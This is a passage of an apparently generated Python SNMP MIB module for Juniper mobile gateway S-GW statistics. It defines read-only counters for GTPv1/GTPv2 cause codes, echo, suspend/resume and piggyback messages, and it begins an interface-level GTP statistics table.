if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnTx.setDescription('Number of GTP packets sent with cause IMSI Not Known.')
jnxMbgSgwPPGtpV2ICsCondIEMsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 166), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsRx.setDescription('Number of GTPV2 packets received with cause Conditional IE Missing.')
jnxMbgSgwPPGtpV2ICsCondIEMsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 167), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCondIEMsTx.setDescription('Number of GTP packets sent with cause Conditional IE Missing.')
jnxMbgSgwPPGtpV2ICsAPNResTIncRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 168), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncRx.setDescription('Number of GTPV2 packets received with cause APN Restriction Type Incompatible.')
jnxMbgSgwPPGtpV2ICsAPNResTIncTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 169), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNResTIncTx.setDescription('Number of GTP packets sent with cause APN Restriction Type Incompatible.')
jnxMbgSgwPPGtpV2ICsUnknownRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 170), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownRx.setDescription('Number of GTPV2 packets received with cause Unknown.')
jnxMbgSgwPPGtpV2ICsUnknownTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 171), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnknownTx.setDescription('Number of GTP packets sent with cause Unknown.')
# --- Per-peer GTPv2 invalid-cause counters, continued (OID arcs 172-201) ---
# Same generated Rx/Tx Counter64 pattern as the preceding causes; these arcs
# cover detach, RAT-change, ISR, TAD and local/peer error causes.
jnxMbgSgwPPGtpV2ICsLclDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 172), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetRx.setDescription('Number of GTP packets received with cause Local Detach.')
jnxMbgSgwPPGtpV2ICsLclDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 173), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetTx.setDescription('Number of GTP packets sent with cause Local Detach.')
jnxMbgSgwPPGtpV2ICsCmpDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 174), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetRx.setDescription('Number of GTP packets received with cause Complete Detach.')
jnxMbgSgwPPGtpV2ICsCmpDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 175), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetTx.setDescription('Number of GTP packets sent with cause Complete Detach.')
jnxMbgSgwPPGtpV2ICsRATChgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 176), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgRx.setDescription('Number of GTP packets received with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwPPGtpV2ICsRATChgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 177), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgTx.setDescription('Number of GTP packets sent with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwPPGtpV2ICsISRDeactRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 178), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactRx.setDescription('Number of GTP packets received with cause ISR Deactivated.')
jnxMbgSgwPPGtpV2ICsISRDeactTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 179), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactTx.setDescription('Number of GTP packets sent with cause ISR Deactivated.')
jnxMbgSgwPPGtpV2ICsEIFRNCEnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 180), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnRx.setDescription('Number of GTP packets received with cause Error Indication from RNC eNodeB.')
jnxMbgSgwPPGtpV2ICsEIFRNCEnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 181), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnTx.setDescription('Number of GTP packets sent with cause Error Indication from RNC eNodeB.')
jnxMbgSgwPPGtpV2ICsSemErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 182), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADRx.setDescription('Number of GTP packets received with cause Semantic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsSemErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 183), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADTx.setDescription('Number of GTP packets sent with cause Semantic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsSynErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 184), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADRx.setDescription('Number of GTP packets received with cause Syntactic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsSynErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 185), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADTx.setDescription('Number of GTP packets sent with cause Syntactic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsRMValRcvRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 186), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvRx.setDescription('Number of GTP packets received with cause Reserved Message Value Received.')
jnxMbgSgwPPGtpV2ICsRMValRcvTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 187), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvTx.setDescription('Number of GTP packets sent with cause Reserved Message Value Received.')
jnxMbgSgwPPGtpV2ICsRPrNtRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 188), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspRx.setDescription('Number of GTP packets received with cause Remote peer not responding.')
jnxMbgSgwPPGtpV2ICsRPrNtRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 189), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspTx.setDescription('Number of GTP packets sent with cause Remote peer not responding.')
jnxMbgSgwPPGtpV2ICsColNWReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 190), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqRx.setDescription('Number of GTP packets received with cause Collision with network initiated request.')
jnxMbgSgwPPGtpV2ICsColNWReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 191), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqTx.setDescription('Number of GTP packets sent with cause Collision with network initiated request.')
jnxMbgSgwPPGtpV2ICsUnPgUESusRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 192), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusRx.setDescription('Number of GTP packets received with cause Unable to page UE due to suspension.')
jnxMbgSgwPPGtpV2ICsUnPgUESusTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 193), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusTx.setDescription('Number of GTP packets sent with cause Unable to page UE due to suspension.')
jnxMbgSgwPPGtpV2ICsInvTotLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 194), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenRx.setDescription('Number of GTP packets received with cause Invalid total len.')
jnxMbgSgwPPGtpV2ICsInvTotLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 195), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenTx.setDescription('Number of GTP packets sent with cause Invalid total len.')
jnxMbgSgwPPGtpV2ICsDtForNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 196), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupRx.setDescription('Number of GTP packets received with cause Data forwarding not supported.')
jnxMbgSgwPPGtpV2ICsDtForNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 197), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupTx.setDescription('Number of GTP packets sent with cause Data forwarding not supported.')
jnxMbgSgwPPGtpV2ICsInReFRePrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 198), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrRx.setDescription('Number of GTP packets received with cause Invalid Reply from Remote peer.')
jnxMbgSgwPPGtpV2ICsInReFRePrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 199), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrTx.setDescription('Number of GTP packets sent with cause Invalid Reply from Remote peer.')
jnxMbgSgwPPGtpV2ICsInvPrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 200), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrRx.setDescription('Number of GTP packets received with cause Invalid peer.')
jnxMbgSgwPPGtpV2ICsInvPrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 201), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrTx.setDescription('Number of GTP packets sent with cause Invalid peer.')
# --- Per-peer GTPv1 protocol/error/echo counters (OID arcs 202-207) ---
# Read-only Counter64 columns for GTPv1-level events: protocol errors,
# unsupported messages, T3 response-timer expiries, end-marker and echo packets.
jnxMbgSgwPPGtpV1ProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 202), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ProtocolErrRx.setDescription('Number of GTPv1 Protocol Errors Received.')
jnxMbgSgwPPGtpV1UnSupMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 203), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1UnSupMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1UnSupMsgRx.setDescription('Number of GTPv1 Unsupported Messages received.')
jnxMbgSgwPPGtpV1T3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 204), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1T3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1T3RespTmrExpRx.setDescription('Number of GTP V1 T3 timer expiries Received.')
jnxMbgSgwPPGtpV1EndMarkerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 205), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerRx.setDescription('Number of GTP V1 end marker packets received.')
jnxMbgSgwPPGtpV1EndMarkerTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 206), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerTx.setDescription('Number of GTP V1 end marker packets sent.')
jnxMbgSgwPPGtpV1EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 207), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqRx.setDescription('Number of GTP V1 echo request packets received.')
# GTPv1 echo requests sent, per peer (read-only Counter64, OID arc 208).
# Fix: description previously read 'GTP iV1' — a typo; every sibling counter
# in this group says 'GTP V1' (e.g. the Rx twin at arc 207).
jnxMbgSgwPPGtpV1EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 208), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqTx.setDescription('Number of GTP V1 echo request packets sent.')
# --- Per-peer GTPv1 echo-response and error-indication counters (arcs 209-212) ---
jnxMbgSgwPPGtpV1EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 209), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespRx.setDescription('Number of GTP V1 echo response packets received.')
jnxMbgSgwPPGtpV1EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 210), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespTx.setDescription('Number of GTP V1 echo response packets sent.')
jnxMbgSgwPPGtpV1ErrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 211), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndRx.setDescription('Number of GTP V1 Error Indication packets received.')
jnxMbgSgwPPGtpV1ErrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 212), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndTx.setDescription('Number of GTP V1 Error Indication packets sent.')
# --- Per-peer GTPv2 Suspend/Resume notification-acknowledgement and piggyback
#     message counters (OID arcs 213-222), Rx/Tx pairs of read-only Counter64s ---
jnxMbgSgwPPSuspNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 213), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifRx.setDescription('Number of GTPv2 Suspend Notification messages received.')
jnxMbgSgwPPSuspNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 214), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifTx.setDescription('Number of GTPv2 Suspend Notification messages sent.')
jnxMbgSgwPPSuspAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 215), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckRx.setDescription('Number of GTPv2 Suspend Acknowledgement messages received.')
jnxMbgSgwPPSuspAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 216), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckTx.setDescription('Number of GTPv2 Suspend Acknowledgement messages sent.')
jnxMbgSgwPPResumeNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 217), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifRx.setDescription('Number of GTPv2 Resume Notification messages received.')
jnxMbgSgwPPResumeNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 218), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifTx.setDescription('Number of GTPv2 Resume Notification messages sent.')
jnxMbgSgwPPResumeAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 219), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckRx.setDescription('Number of GTPv2 Resume Acknowledgement messages received.')
jnxMbgSgwPPResumeAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 220), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckTx.setDescription('Number of GTPv2 Resume Acknowledgement messages sent.')
jnxMbgSgwPPPiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 221), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgRx.setDescription('Number of GTPv2 Piggyback messages received.')
jnxMbgSgwPPPiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 222), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgTx.setDescription('Number of GTPv2 S11 Piggyback messages sent.')
# --- Interface-level GTP statistics table scaffolding ---
# The table's conceptual rows are indexed by (jnxMbgGwIndex, jnxMbgSgwIfIndex);
# jnxMbgGwIndex is imported from JUNIPER-MOBILE-GATEWAYS, jnxMbgSgwIfIndex is
# the not-accessible index column defined just below.
jnxMbgSgwGtpIfStatsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4), )
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsTable.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsTable.setDescription('Each entry corresponds to an interface level GTP statistic.')
jnxMbgSgwGtpIfStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1), ).setIndexNames((0, "JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwIndex"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwIfIndex"))
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsEntry.setDescription('A specification of the GTP interface level control Statistics.')
# Index column: no setMaxAccess() call, so it is not directly readable
# (standard SMI practice for index objects).
jnxMbgSgwIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 1), Unsigned32())
if mibBuilder.loadTexts: jnxMbgSgwIfIndex.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfIndex.setDescription('GTP Interface Index')
# --- Columns of jnxMbgSgwGtpIfStatsTable (OID arcs 2-25) ---
# All read-only; jnxMbgSgwIfType is a DisplayString (interface name), the rest
# are Counter64 packet/byte/error counters at the GTP interface level.
jnxMbgSgwIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfType.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfType.setDescription('Interface Name.')
jnxMbgSgwIfRxPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRxPacketsDropped.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRxPacketsDropped.setDescription('Number of Received GTP Packets Dropped by the Gateway.')
jnxMbgSgwIfPacketAllocFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPacketAllocFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPacketAllocFail.setDescription('Number of Packet allocation failures in the Gateway.')
jnxMbgSgwIfPacketSendFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPacketSendFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPacketSendFail.setDescription('Number of GTP Packet Send failures in the Gateway.')
jnxMbgSgwIfIPVerErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfIPVerErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfIPVerErrRx.setDescription('Number of IP Version Error Packets Received.')
jnxMbgSgwIfIPProtoErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfIPProtoErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfIPProtoErrRx.setDescription('Number of IP Protocol Error packets Received.')
jnxMbgSgwIfGTPPortErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGTPPortErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGTPPortErrRx.setDescription('Number of Port Error Packets Received.')
jnxMbgSgwIfGTPUnknVerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 9), Counter64()).setMaxAccess("readonly")
